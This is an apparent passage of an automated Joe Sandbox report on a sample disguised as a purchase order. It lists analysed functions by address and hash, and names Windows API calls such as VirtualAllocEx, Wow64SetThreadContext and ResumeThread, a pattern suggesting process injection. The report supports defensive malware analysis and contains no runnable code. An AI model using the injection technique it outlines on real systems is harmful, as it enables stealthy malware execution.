Function 066D4850 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D48D0

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9fcfe363f8c878d4a33386e934b9d4f10961ea5264aa533affc5bb29a7e7f26b
Instruction ID: 547bd6b9aa98494439fee285f62a72e1ee34fa4d6825b9dc0198f470aee546a3
Opcode Fuzzy Hash: 9fcfe363f8c878d4a33386e934b9d4f10961ea5264aa533affc5bb29a7e7f26b
Instruction Fuzzy Hash: E32114B2C003499FDB10CFAAC881BEEBBF5FF48310F54842AE559A7240C7799950CBA0

Function 066D4190 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D420E

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2c303c0b6cbbb4bec45cb3e202ea661d96cc473f704c2febfc04c407a39ebf57
Instruction ID: 8baf247750a94cbe58c7f69926461fe4d4644c131396e138f1b088802f793f64
Opcode Fuzzy Hash: 2c303c0b6cbbb4bec45cb3e202ea661d96cc473f704c2febfc04c407a39ebf57
Instruction Fuzzy Hash: B2211875D103098FDB10DFAAC4857EEBBF4EF48214F14842AD559A7240DB789945CFA1

Function 00B8D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8D717

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: aebfc12c5a357408873bb24e2c5f3b2c4541b76da34f4a78203efe1f441a135d
Instruction ID: c6bf78e5e8f96f91f88416e46791acc94f1af0674294b3c4d1f1a11b5d407f1e
Opcode Fuzzy Hash: aebfc12c5a357408873bb24e2c5f3b2c4541b76da34f4a78203efe1f441a135d
Instruction Fuzzy Hash: 8C21D5B5900249DFDB10CF9AD584ADEFBF4FB48310F14845AE914A3350D374A954CFA5

Function 066D4698 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D470E

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f32d0f2c417d8f2165e2a72f11b5dd4ae3ff28234505445fe6d6e3c1c9285621
Instruction ID: 15d8abd9558c1ee76229ea5261166977bcd451641560e74515e5e752421b896c
Opcode Fuzzy Hash: f32d0f2c417d8f2165e2a72f11b5dd4ae3ff28234505445fe6d6e3c1c9285621
Instruction Fuzzy Hash: FA1189728002499FDB10CFA9C844BDEBBF5EF48320F148419E519A7250CB759900CBA0

Function 066D46A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D470E

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 571e0cd0a006c7dc01502aa6ca74ed00bcad32905f3fce7949d26c2889bc720e
Instruction ID: 991ac5e5b91bc450a19d96a622f138521b5cee45962335fde800a7e896235c5c
Opcode Fuzzy Hash: 571e0cd0a006c7dc01502aa6ca74ed00bcad32905f3fce7949d26c2889bc720e
Instruction Fuzzy Hash: E71167729003499FDB10CFAAC844BDFBBF5EF48320F14841AE519A7250CB75A940CFA0

Function 066D40E0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 066D4142

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 875e65c0dadd67128a513d0256ec6277dfe93f90a69859fe780d764acb7499a9
Instruction ID: 83e412510242d71cd832e7ca55d2c02ab9c148cf9fb3f6432f4dbc5a071b84af
Opcode Fuzzy Hash: 875e65c0dadd67128a513d0256ec6277dfe93f90a69859fe780d764acb7499a9
Instruction Fuzzy Hash: 2B113A71D003498FDB10DFAAC8457EEFBF4EF88224F14841AD559A7340CB79A944CB94

Function 00B8AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B8AFFE

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 994ab73731d9a37d98446a538ca730fa39032e23c99d7f2442ad52480ff1e45c
Instruction ID: 4d459f76753459b5589e926a767ed6d0b27d46bfe59c170a14dbcb00bb68fd2c
Opcode Fuzzy Hash: 994ab73731d9a37d98446a538ca730fa39032e23c99d7f2442ad52480ff1e45c
Instruction Fuzzy Hash: 201110B6C002498FDB10DF9AC444BDEFBF4EF88324F10846AD429A7220D379A545CFA1

Function 066D77D9 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 066D7805

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d022da9c4ee42cec2f9eac0e72fcad209cfc72a03ca61e3b77a140be041eb9cb
Instruction ID: f5b0ebb2b57be4ebe6c1f8b442389de671048dea8cfba79645d41ea5bd603035
Opcode Fuzzy Hash: d022da9c4ee42cec2f9eac0e72fcad209cfc72a03ca61e3b77a140be041eb9cb
Instruction Fuzzy Hash: 88F0E2B68003099FDB50CF89D884BDEBBF4EB48324F10885AE558A7250C379A584CFA1

Function 00ADD1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf79f192a563b1719bea79e7029cc1e1a6d8df7ec510df8d81a35d5907036c2
Instruction ID: 2001133aa88204d86de63e7b5f05e26029cb817626f86abdf6a905bd48677c0d
Opcode Fuzzy Hash: 8bf79f192a563b1719bea79e7029cc1e1a6d8df7ec510df8d81a35d5907036c2
Instruction Fuzzy Hash: C421D372504344DFDB05DF50D9C4BAABB75FB88314F24C5AAE90A0B346C336D816CBA2

Function 00ADD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5806726600def8db2a6d19cdfca3159443362eda839970bd683fbd24d6617eb7
Instruction ID: 2cc6bf697e5a84160d8c981471285738182541d5c0bdc223891956ba813fc5b6
Opcode Fuzzy Hash: 5806726600def8db2a6d19cdfca3159443362eda839970bd683fbd24d6617eb7
Instruction Fuzzy Hash: 4121F5B1544244EFDB15DF14E9C0F26BF65FB88318F24C56AE80A0B356C336D856CBA2

Function 00AED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349625631.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f899008c2766aaaab9f478bcc6df032523a8bd11fa7cb59ed545db98f831e0fb
Instruction ID: 496b15416d3f3a57842278911d96fe178e6803463e4cde75556c123fbdb3f761
Opcode Fuzzy Hash: f899008c2766aaaab9f478bcc6df032523a8bd11fa7cb59ed545db98f831e0fb
Instruction Fuzzy Hash: 8021F271604384DFDB14DF10D9C0B26BB65FB84314F28C569D80A4B286C336D847CA62

Function 00AED006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349625631.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ba7de488ca594a4bec5d203cabeae7ecacc213daf2f4748696b0ade6071ccb
Instruction ID: 973d54091efe079205f09c9013ef12ec44a732b1e973ac60f8f95bb1c092e293
Opcode Fuzzy Hash: d9ba7de488ca594a4bec5d203cabeae7ecacc213daf2f4748696b0ade6071ccb
Instruction Fuzzy Hash: E8215E755093C08FCB12CF24D994715BF71EB46314F28C5EAD8498B6A7C33A984ACB62

Function 00ADD1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dce05a956da371322a9adc0a0d4b4c51a05561a1f56c2dd05ac87206c169886
Instruction ID: 226ea1e803bae2258686b197b9bf06e8aa6dd2530874d7674aed87b5ffdee3bb
Opcode Fuzzy Hash: 5dce05a956da371322a9adc0a0d4b4c51a05561a1f56c2dd05ac87206c169886
Instruction Fuzzy Hash: AF21AF76504240DFCB06CF50D9C4B96BF72FB84314F24C5AADC090B656C33AD866CBA1

Function 00ADD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction ID: a4f82c59a1ed901e1f6211b88da798d8e93bfdb68271e3713561884cfa7755c1
Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction Fuzzy Hash: 2F11D376504280DFCB15CF10D5C4B56BF71FB94318F24C6AAD84A0B756C336D856CBA1

Function 00ADD731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d2e16880d940eef79bd059e4f2ba42ed36687a57e4c07d4fa6f6f810306321
Instruction ID: 6ce4825aeaf1525fd231667d9338810c9dc9e6a92829bd6b6c7e0578ee812802
Opcode Fuzzy Hash: 09d2e16880d940eef79bd059e4f2ba42ed36687a57e4c07d4fa6f6f810306321
Instruction Fuzzy Hash: E201A2325043449FE7108B25CD84B66BBE8EF41325F28C4ABED0A5A382D6799840CAB2

Function 00ADD730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349562699.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ebc15b75ef991b0a0b96d93b8f896582a799a9a58c5a9eac3bb61f5bfa2cd1
Instruction ID: 74822d2201ddcaaf9579361689fc1d58b61310bfa3cbfcd156ed49145398f482
Opcode Fuzzy Hash: 22ebc15b75ef991b0a0b96d93b8f896582a799a9a58c5a9eac3bb61f5bfa2cd1
Instruction Fuzzy Hash: 48F06D72404344AFEB108B16DD84B66FBECEB91735F18C59BED095E282C279AC44CAB1

Non-executed Functions

Function 066D1DD8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795c55bda4f5551e6e5a023602a6b17bf34005ecac8ce167917e1b743dcb29d8
Instruction ID: a278a3a376bceb0272d73a5d36eb94347d41930593a42885a94548a957ed00e3
Opcode Fuzzy Hash: 795c55bda4f5551e6e5a023602a6b17bf34005ecac8ce167917e1b743dcb29d8
Instruction Fuzzy Hash: C5E12674E002598FDB14DFA8C580AAEFBF2FF89301F248169D518AB355D731A942CFA0

Function 066D4268 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac9a810087b263b1408e7d9bf35213e7e98d19108b366b5452d44b263d7fb044
Instruction ID: 6f02688cfbf84be3d8eeb35d091c168d1bf84adc33040bb73b02731863968e5d
Opcode Fuzzy Hash: ac9a810087b263b1408e7d9bf35213e7e98d19108b366b5452d44b263d7fb044
Instruction Fuzzy Hash: 32E1E574E002598FDB14DFA9C580AAEFBF2FB89305F248169D415AB355DB30AD46CFA0

Function 066D2210 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996b59013d7154556e172be40221c4c89f1e13e0a95c05b59b445d3b2a9ddef0
Instruction ID: 0fbabf859f73a05712723cad77feb29a2eedb5fb1c09ab225eb4e0d712260e32
Opcode Fuzzy Hash: 996b59013d7154556e172be40221c4c89f1e13e0a95c05b59b445d3b2a9ddef0
Instruction Fuzzy Hash: C9E13874E002598FDB14DFA9C590AAEFBB2FF89304F248169D919AB355D730AD42CF60

Function 066D38B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8cb02df9a07b23ee51c5a80d97bbe2cb6c094f2ad8cc1a66dbfdb2f465e61a6
Instruction ID: b635cb03223fa87752f176335cf4c913063b2a7b417aa590ec1d631400e5d011
Opcode Fuzzy Hash: d8cb02df9a07b23ee51c5a80d97bbe2cb6c094f2ad8cc1a66dbfdb2f465e61a6
Instruction Fuzzy Hash: 57E12774E002198FDB14DFA9C580AAEFBB2FF89300F248169D419AB355D731AD46CFA1

Function 00B8D5BC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f4a1a27038b64020579555196f4244cf626dcaed3f7721a1cab569852b6b9c
Instruction ID: c3dfbd5bd13db08c4ec4fed2444d261fb8c9f4d7b948a0dd1ad0a81a9d3bac5b
Opcode Fuzzy Hash: d9f4a1a27038b64020579555196f4244cf626dcaed3f7721a1cab569852b6b9c
Instruction Fuzzy Hash: 98A13A36E00206CFCF05EFA5D8845AEB7F2FF89304B2545BAE905AB265DB31E955CB40

Analysis Process: Purchase Order 007823-PO# 005307.exePID: 7704, Parent PID: 7488COMMON

Executed Functions

Function 02969DE0 Relevance: 1.1, Instructions: 1139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae4b3fa7baf1aed9813e804d821ea74786c97d1e5c9da5ecefa1a16214930e1
Instruction ID: beb01d0dc9821328e1429ffc131a8964cb65fea321f045c85c5eee4a68841372
Opcode Fuzzy Hash: 6ae4b3fa7baf1aed9813e804d821ea74786c97d1e5c9da5ecefa1a16214930e1
Instruction Fuzzy Hash: 51A26D70A00209CFDB15CFA8C988ABEBBF6FF89304F15856AE405AB265D735ED41CB51

Function 029669A0 Relevance: .5, Instructions: 516COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb07bd206238ad201a725420bf686c5cf30adf958ea0d31e76948ed6612fa1f
Instruction ID: 5dcca53cc2465243fa98a0a314befe79f0fafd04ef8e3385623d19c79bfbe76d
Opcode Fuzzy Hash: 2cb07bd206238ad201a725420bf686c5cf30adf958ea0d31e76948ed6612fa1f
Instruction Fuzzy Hash: D9125E70A002199FDB14DFA9C958BAEBBFAFF88304F108569E405EB355DB349D42CB90

Function 02966FC8 Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3fa367f89be8849b9a39087bec74b5328078282f1e1aa6fed8e6aa0058079e
Instruction ID: 5efd56717851cf9cfc780afb261d7672e4d143ddefcfeed536d958f2d4c0f23d
Opcode Fuzzy Hash: cd3fa367f89be8849b9a39087bec74b5328078282f1e1aa6fed8e6aa0058079e
Instruction Fuzzy Hash: 8F123970A00209DFCB15CFA9D988AADFBF6FF88308F158466E815AB265D734DD41CB51

Function 02963E09 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1abcc9de9689762f05c63d10e1535d4cd832e18117386ea700225ffebd7895
Instruction ID: f79553c00e9fffe083b8d0889f28e9288a15add317813ad55fa62b2e1c7e7ef2
Opcode Fuzzy Hash: 2a1abcc9de9689762f05c63d10e1535d4cd832e18117386ea700225ffebd7895
Instruction Fuzzy Hash: FFF17A34E04219DFDB08DFB9D8946BEBBF2BFC9700B148569D446AB395DB359802CB90

Function 0296C146 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb5017780cd47b691ce90bf07a03056dc9b644f0e2443466daf498d8fe88dce
Instruction ID: 3d8d8688cf9e8ff38c92117251e53b99c84479b31ee626931ff809a0e5d24969
Opcode Fuzzy Hash: cbb5017780cd47b691ce90bf07a03056dc9b644f0e2443466daf498d8fe88dce
Instruction Fuzzy Hash: 5AA1DB74E04218DFDB14DFA9D888BADBBF2BF89304F15806AE449AB365DB309945CF50

Function 02965362 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1097d89c6dcbb0015ee9fe5dce9c5f3f96a52cb7349df7b6e25d060cda0927
Instruction ID: e8eb579875342df4058f2ccfcf644b6f0f44a7d3bd3415635ce5eac45a8f41cf
Opcode Fuzzy Hash: cc1097d89c6dcbb0015ee9fe5dce9c5f3f96a52cb7349df7b6e25d060cda0927
Instruction Fuzzy Hash: 9891C674E01218CFDB14DFAAD888A9DBBF2BF89301F558069D409BB365DB349945CF50

Function 0296C468 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1460ed52d32875d407fe0c42fc72a2ce0834f37f8e6406e3548f517db81085d
Instruction ID: 2fedbc5d9e397271677f24ce94979bf4285c03ddb4435d285264126f96c81e7b
Opcode Fuzzy Hash: c1460ed52d32875d407fe0c42fc72a2ce0834f37f8e6406e3548f517db81085d
Instruction Fuzzy Hash: EE81B674E00218CFDB14DFAAD988BADBBF2BF88300F14906AE459AB365DB305945CF55

Function 0296D278 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d38e7780cfd5f2e209455e2914e51ba805626525eab3186038f969e4ba414a0b
Instruction ID: 416a4aeacde38a2d8edd1fc930744a41402fee123a84732007ec2371fcbcfa1d
Opcode Fuzzy Hash: d38e7780cfd5f2e209455e2914e51ba805626525eab3186038f969e4ba414a0b
Instruction Fuzzy Hash: B9819674E00218CFEB18DFAAD988BADBBF2BF89304F148069D419AB365DB345945CF10

Function 0296CCD8 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43037b203dde85e987cff0c660eb282963bcbe78f72342daa14519ef1eff70fe
Instruction ID: 33fae3f2ab43c9a7f05ac75af00b21b7150e6192a2f00730b0196c42cf339871
Opcode Fuzzy Hash: 43037b203dde85e987cff0c660eb282963bcbe78f72342daa14519ef1eff70fe
Instruction Fuzzy Hash: 31819774E00218DFEB14DFAAD948A9DBBF2BF89300F14C06AE459AB365DB345945CF50

Function 0296CFA9 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad70fbff43ee72223b64c40fa865aaf4d87dd3b96cbabfc7f26891405e51657
Instruction ID: a971e27754452ace12ce3e4bef59a2b7786028280e1e4d4ae7ee9f434c7b3400
Opcode Fuzzy Hash: 0ad70fbff43ee72223b64c40fa865aaf4d87dd3b96cbabfc7f26891405e51657
Instruction Fuzzy Hash: 91819774E00218CFEB18DFA9D988AADBBF2BF89300F158069D419AB365DB745945CF50

Function 0296CA08 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8646f8af802b4559d56391af67fa9aaacc90966b9d09729875df821b49427eaf
Instruction ID: 613180994caf01e7d5f9595dc24c780bd7487d598de3343f98455092d88b36ac
Opcode Fuzzy Hash: 8646f8af802b4559d56391af67fa9aaacc90966b9d09729875df821b49427eaf
Instruction Fuzzy Hash: 33819874E00218CFEB14DFA9D948AADBBF2BF89300F14C46AE459AB365DB345945CF50

Function 0296C738 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0aa730669887a327f02f2b1774f6937d1802dc00bb21d9624bafcd5d3da20d6
Instruction ID: e9bc8e4f60f794a6da13ef95ffe0fca390a3a6df883ec0d42359044f85c3e535
Opcode Fuzzy Hash: d0aa730669887a327f02f2b1774f6937d1802dc00bb21d9624bafcd5d3da20d6
Instruction Fuzzy Hash: 17818674E00218CFEB14DFAAD948BADBBF2BF89300F14806AE459AB365DB345945CF50

Function 0296E97A Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3700ac56697efc8b308647cf2b001f6dfaa86cbb21d8e4f5c70630ac9215d29
Instruction ID: 4b128a60bc6dd5677e5f083d73211419c238473b1eb91636c233e5181fa501c1
Opcode Fuzzy Hash: a3700ac56697efc8b308647cf2b001f6dfaa86cbb21d8e4f5c70630ac9215d29
Instruction Fuzzy Hash: 35518774E04208DFDB18DFAAD594AADBBF2BF89300F14D12AE815AB365DB315846CF14

Function 0296E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506bf6b73671edf477c75f5a85b92f9f9001d9400b7edd941fe4997dad800c42
Instruction ID: 9e40ec95fe368cb35fc3302693d812b8d21df39843c379388c08537672fe9270
Opcode Fuzzy Hash: 506bf6b73671edf477c75f5a85b92f9f9001d9400b7edd941fe4997dad800c42
Instruction Fuzzy Hash: 4F518674E00208DFDB18DFAAD594AADBBF2BF89300F24C02AE815AB365DB315945CF54

Function 0296E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

